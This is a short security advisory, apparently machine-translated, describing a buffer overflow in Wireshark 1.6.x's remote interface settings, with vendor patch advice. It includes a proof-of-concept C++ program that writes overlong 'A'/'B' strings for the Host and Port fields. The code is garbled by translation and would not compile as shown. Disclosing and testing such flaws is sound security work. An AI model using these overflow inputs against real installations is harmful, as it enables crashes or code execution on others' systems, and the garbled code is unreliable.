Wireshark remote Interface Buffer Overflow Vulnerability
Release date:
Updated on:
Affected Systems:
Wireshark 1.6.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55211
Wireshark (formerly known as Ethereal) is a network group analysis software.
Wireshark 1.6.0, 1.8.2, and other versions have a buffer overflow vulnerability. This vulnerability allows remote attackers to execute arbitrary code in affected applications.
<* Source: X-h4ck
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
X-h4ck () provides the following testing methods:
# Include <cstdio>
# Include <iostream>
// Wrote a little shit code to generate> nicely for u those strings
Using namespace std;
Int main (){
Char buff1 [] = "\ x41 ";
Char buff2 [] = "\ x42 ";
FILE * txtfile;
Txtfile = fopen ("c: \ exploit.txt", "w ");
Fputs ("Host Input: \ n", txtfile );
For (int I = 0; I <659; I ++ ){
Fputs (buff1, txtfile );
}
Fputs ("\ n", txtfile );
Fputs ("Port Input: \ n", txtfile );
For (int y = 0; y <652; y ++ ){
Fputs (buff1, txtfile );
}
For (int x = 0; x <8; x ++ ){
Fputs (buff2, txtfile );
}
Fclose (txtfile );
Return 0;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Wireshark
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.wireshark.org/security/